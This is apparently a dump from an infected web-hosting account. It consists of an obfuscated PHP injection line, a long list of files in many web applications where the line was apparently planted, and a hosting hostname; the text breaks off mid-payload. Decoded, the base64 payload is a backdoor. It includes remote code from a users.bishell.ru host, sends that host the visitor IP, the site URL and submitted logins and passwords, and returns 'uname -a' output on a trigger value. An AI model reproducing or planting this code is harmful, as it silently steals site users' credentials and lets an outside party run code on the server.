dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pIGFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhSFIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>
for files:
/home/www/confixx/html/webapps:
./phpsurveyor/guest.php ./phpsurveyor/messages.php ./weberp/guest.php ./weberp/messages.php ./openbiblio/finfo.php ./openbiblio/tests.php ./Owl/common.php ./Owl/contacts.php ./MovableType/remote.php ./MovableType/download.php ./pLog/report.php ./pLog/date.php ./squirrelmail/common.php ./squirrelmail/commands.php ./openit/links.php ./openit/tests.php ./phpBB/finfo.php ./phpBB/tests.php ./gtchat/configs.php ./gtchat/messages.php ./phpwebsite/layout.php ./phpwebsite/properties.php ./sendcard/time.php ./sendcard/date.php ./AutoIndex/configs.php ./AutoIndex/includes.php ./escene/report.php ./escene/date.php ./kplaylist/remote.php ./kplaylist/download.php ./phpwhois/create.php ./phpwhois/base.php ./CSLH/layout.php ./CSLH/properties.php ./dotproject/common.php ./dotproject/commands.php ./zencart/configs.php ./zencart/messages.php ./template/download.php ./template/base.php ./phpnuke/includes.php ./phpnuke/include.php ./phpMoney/system.php ./phpMoney/properties.php ./phpMyFamily/report.php ./phpMyFamily/include.php ./cubecart/system.php ./cubecart/time.php ./getid/links.php ./getid/package.php ./topdownloads/layout.php ./topdownloads/options.php ./osCommerce/create.php ./osCommerce/guest.php ./xrms/create.php ./xrms/guest.php ./eGroupWare/report.php ./eGroupWare/include.php ./phpBugTracker/create.php ./phpBugTracker/base.php ./phpSupportTickets/system.php ./phpSupportTickets/properties.php ./AdvancedPoll/create.php ./AdvancedPoll/guest.php ./knowledgetree/package.php ./knowledgetree/remote.php ./phpAds/finfo.php ./phpAds/contacts.php ./PHProjekt/system.php ./PHProjekt/properties.php ./nucleus/configs.php ./nucleus/includes.php ./SSM/commands.php ./SSM/options.php ./creloaded/finfo.php ./creloaded/contacts.php ./Links/system.php ./Links/properties.php ./b2evolution/configs.php ./b2evolution/includes.php ./pmachinefree/finfo.php ./pmachinefree/tests.php ./formmail/time.php ./formmail/date.php ./HelpCenterLive/finfo.php ./HelpCenterLive/contacts.php ./classifieds/download.php ./classifieds/base.php ./mediawiki/includes.php ./mediawiki/include.php ./vstat/commands.php ./vstat/options.php ./phpList/system.php ./phpList/time.php ./geeklog/system.php ./geeklog/time.php ./4images/configs.php ./4images/includes.php ./bbclone/create.php ./bbclone/base.php ./WebShopmanager/report.php ./WebShopmanager/date.php ./Coppermine/package.php ./Coppermine/remote.php ./guestbook/common.php ./guestbook/commands.php ./skins/common.php ./skins/contacts.php ./xaraya/links.php ./xaraya/package.php ./phpDig/common.php ./phpDig/commands.php ./osTicket/links.php ./osTicket/tests.php ./DocFAQ/links.php ./DocFAQ/tests.php ./Drupal/finfo.php ./Drupal/contacts.php ./Tellme/includes.php ./Tellme/include.php ./SupportLogic/common.php ./SupportLogic/contacts.php ./phpdocumentor/create.php ./phpdocumentor/guest.php ./gallery/commands.php ./gallery/options.php ./phpbannerexchange/layout.php ./phpbannerexchange/options.php ./Events/layout.php ./Events/options.php ./Care2x/download.php ./Care2x/base.php ./phpwcms/configs.php ./phpwcms/messages.php ./phpmyforum/links.php ./phpmyforum/tests.php ./WebCalendar/common.php ./WebCalendar/contacts.php ./videodb/remote.php ./videodb/download.php ./Mambo/time.php ./Mambo/date.php ./agoracart/package.php ./agoracart/remote.php ./WordPress/commands.php ./WordPress/options.php ./Siteframe/layout.php ./Siteframe/options.php ./UebiMiau/links.php ./UebiMiau/package.php ./wbbook/report.php ./wbbook/include.php ./phpWiki/report.php ./phpWiki/date.php ./YaBB/system.php ./YaBB/time.php ./TUTOS/guest.php ./TUTOS/messages.php ./phpBBAuction/time.php ./phpBBAuction/date.php ./xoops/layout.php ./xoops/properties.php ./typo/configs.php ./typo/messages.php ./bookstore/package.php ./bookstore/remote.php ./phpBook/layout.php ./phpBook/properties.php ./tsep/includes.php ./tsep/include.php ./PostNuke/report.php ./PostNuke/include.php ./noahclass/download.php ./noahclass/base.php
/home/www/confixx/html/skins:
./mskin_17/big_icons/system.php ./mskin_17/big_icons/properties.php ./mskin_17/layout.php ./mskin_17/css/main/create.php ./mskin_17/css/main/base.php ./mskin_17/css/top/remote.php ./mskin_17/css/top/download.php ./mskin_17/css/help/configs.php ./mskin_17/css/help/includes.php ./mskin_17/css/report.php ./mskin_17/css/include.php ./mskin_17/css/left/guest.php ./mskin_17/css/left/messages.php ./mskin_17/small_icons/finfo.php ./mskin_17/small_icons/tests.php ./mskin_17/options.php ./mskin_17/images/links.php ./mskin_17/images/package.php ./mskin_17/buttons/time.php ./mskin_17/buttons/date.php ./time.php ./date.php ./mskin_15/big_icons/configs.php ./mskin_15/big_icons/includes.php ./mskin_15/css/main/finfo.php ./mskin_15/css/main/tests.php ./mskin_15/css/create.php ./mskin_15/css/top/common.php ./mskin_15/css/top/contacts.php ./mskin_15/css/help/remote.php ./mskin_15/css/help/download.php ./mskin_15/css/left/links.php ./mskin_15/css/left/package.php ./mskin_15/css/base.php ./mskin_15/report.php ./mskin_15/small_icons/layout.php ./mskin_15/small_icons/properties.php ./mskin_15/include.php ./mskin_15/images/commands.php ./mskin_15/images/options.php ./mskin_15/buttons/guest.php ./mskin_15/buttons/messages.php
login-33.hoststar.ch
<?php error_reporting(0);$p="jdcczzazbzcc";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnByb3RlY3RlZCAkZnVsbHVybDsgcHJvdGVjdGVkICRwX3VybDsgcHJvdGVjdGVkICRjb25uX2lkOyBwcm90ZWN0ZWQgJGZsdXNoZWQ7IHByb3RlY3RlZCAkbW9kZSA9IDQ7IHByb3RlY3RlZCAkZGVmbW9kZTsgcHJvdGVjdGVkICRyZWRpcmVjdHMgPSAwOyBwcm90ZWN0ZWQgJGJpbmFyeTsgcHJvdGVjdGVkICRvcHRpb25zOyBwcm90ZWN0ZWQgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KcHJvdGVjdGVkIGZ1bmN0aW9uIGVycm9yKCRtc2c9J25vdCBjb25uZWN0ZWQnKSB7IGlmICgkdGhpcy0+b3B0aW9ucyAmIFNUUkVBTV9SRVBPUlRfRVJST1JTKSB7IHRyaWdnZXJfZXJyb3IoJG1zZywgRV9VU0VSX1dBUk5JTkcpOyB9IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9vcGVuKCRwYXRoLCAkbW9kZSwgJG9wdGlvbnMsICRvcGVuZWRfcGF0aCkgeyAkdGhpcy0+ZnVsbHVybCA9ICRwYXRoOyAkdGhpcy0+b3B0aW9ucyA9ICRvcHRpb25zOyAkdGhpcy0+ZGVmbW9kZSA9ICRtb2RlOyAkdXJsID0gcGFyc2VfdXJsKCRwYXRoKTsgaWYgKGVtcHR5KCR1cmxbJ2hvc3QnXSkpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignbWlzc2luZyBob3N0IG5hbWUnKTsgfSAkdGhpcy0+Y29ubl9pZCA9IGZzb2Nrb3BlbigkdXJsWydob3N0J10sIChlbXB0eSgkdXJsWydwb3J0J10pID8gODAgOiBpbnR2YWwoJHVybFsncG9ydCddKSksICRlcnJubywgJGVycnN0ciwgMik7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChlbXB0eSgkdXJsWydwYXRoJ10pKSB7ICR1cmxbJ3BhdGgnXSA9ICcvJzsgfSAkdGhpcy0+cF91cmwgPSAkdXJsOyAkdGhpcy0+Zmx1c2hlZCA9IGZhbHNlOyBpZiAoJG1vZGVbMF0gIT0gJ3InIHx8IChzdHJwb3MoJG1vZGUsICcrJykgIT09IGZhbHNlKSkgeyAkdGhpcy0+bW9kZSArPSAyOyB9ICR0aGlzLT5iaW5hcnkgPSAoc3RycG9zKCRtb2RlLCAnYicpICE9PSBmYWxzZSk7ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgaWYgKCFpc3NldCgkY1snbWV0aG9kJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21ldGhvZCcsICdHRVQnKTsgfSBpZiAoIWlzc2V0KCRjWydoZWFkZXInXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnaGVhZGVyJywgJycpOyB9IGlmICghaXNzZXQoJGNbJ3VzZXJfYWdlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAndXNlcl9hZ2VudCcsIGluaV9nZXQoJ3VzZXJfYWdlbnQnKSk7IH0gaWYgKCFpc3NldCgkY1snY29udGVudCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdjb250ZW50JywgJycpOyB9IGlmICghaXNzZXQoJGNbJ21heF9yZWRpcmVjdHMnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWF4X3JlZGlyZWN0cycsIDUpOyB9IHJldHVybiB0cnVlOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fcmVhZCgkYnl0ZXMpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+Zmx1c2hlZCAmJiAhJHRoaXMtPnN0cmVhbV9mbHVzaCgpKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZmVvZigkdGhpcy0+Y29ubl9pZCkpIHsgcmV0dXJuICcnOyB9ICRieXRlcyA9IG1heCgxLCRieXRlcyk7IGlmICgkdGhpcy0+YmluYXJ5KSB7IHJldHVybiBmcmVhZCgkdGhpcy0+Y29ubl9pZCwgJGJ5dGVzKTsgfSBlbHNlIHsgcmV0dXJuIGZnZXRzKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fd3JpdGUoJGRhdGEpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gJHRoaXMtPmVycm9yKCk7IH0gaWYgKCEkdGhpcy0+bW9kZSAmIDIpIHsgcmV0dXJuICR0aGlzLT5lcnJvcignU3RyZWFtIGlzIGluIHJlYWQtb25seSBtb2RlJyk7IH0gJGMgPSAkdGhpcy0+Y29udGV4dCgpOyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAoKCR0aGlzLT5kZWZtb2RlWzBdID09ICd4JykgPyAnUFVUJyA6ICdQT1NUJykpOyBpZiAoc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICRjWydjb250ZW50J10uJGRhdGEpKSB7IHJldHVybiBzdHJsZW4oJGRhdGEpOyB9IHJldHVybiAwOyB9DQpwdWJsaWMgZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc2Vlaygkb2Zmc2V0LCAkd2hlbmNlKSB7IHJldHVybiBmYWxzZTsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV90ZWxsKCkgeyByZXR1cm4gMDsgfQ0KcHVibGljIGZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RyaXBvcygkZGF0YSwgJ0xvY2F0aW9uOiAnKSAhPT0gZmFsc2UpIHsgJG5ld19sb2NhdGlvbiA9IHRyaW0oc3RyX2lyZXBsYWNlKCdMb2NhdGlvbjogJywgJycsICRkYXRhKSk7IGJyZWFrOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB9IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLic6ICcuJG5ld19sb2NhdGlvbiwgRV9VU0VSX05PVElDRSk7ICR0aGlzLT5zdHJlYW1fY2xvc2UoKTsgcmV0dXJuICgkY1snbWF4X3JlZGlyZWN0cyddID4gJHRoaXMtPnJlZGlyZWN0cysrICYmICR0aGlzLT5zdHJlYW1fb3BlbigkbmV3X2xvY2F0aW9uLCAkdGhpcy0+ZGVmbW9kZSwgJHRoaXMtPm9wdGlvbnMsIG51bGwpICYmICR0aGlzLT5zdHJlYW1fZmx1c2goKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyAkaHR0cF9yZXNwb25zZV9oZWFkZXIgLj0gJGRhdGEuIlxyXG4iOyBpZiAoc3RyaXBvcygkZGF0YSwgJ0NvbnRlbnQtTGVuZ3RoOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ3NpemUnXSA9IHRyaW0oc3RyX2lyZXBsYWNlKCdDb250ZW50LUxlbmd0aDogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnRGF0ZTogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydhdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnRGF0ZTogJywgJycsICRkYXRhKSk7IH0gZWxzZWlmIChzdHJpcG9zKCRkYXRhLCAnTGFzdC1Nb2RpZmllZDogJykgIT09IGZhbHNlKSB7ICR0aGlzLT5zdGF0WydtdGltZSddID0gc3RydG90aW1lKHN0cl9pcmVwbGFjZSgnTGFzdC1Nb2RpZmllZDogJywgJycsICRkYXRhKSk7IH0gJGRhdGEgPSBydHJpbShmZ2V0cygkdGhpcy0+Y29ubl9pZCwgMTAyNCkpOyB9IGlmICgkaGVhZFsxXSA+PSA0MDApIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9XQVJOSU5HKTsgcmV0dXJuIGZhbHNlOyB9IGlmICgkaGVhZFsxXSA9PSAzMDQpIHsgdHJpZ2dlcl9lcnJvcigkdGhpcy0+ZnVsbHVybC4nICcuJGhlYWRbMl0sIEVfVVNFUl9OT1RJQ0UpOyByZXR1cm4gZmFsc2U7IH0gcmV0dXJuIHRydWU7IH0NCnB1YmxpYyBmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCnB1YmxpYyBmdW5jdGlvbiBkaXJfb3BlbmRpcigkcGF0aCwgJG9wdGlvbnMpIHsgcmV0dXJuIGZhbHNlOyB9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pIGFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhS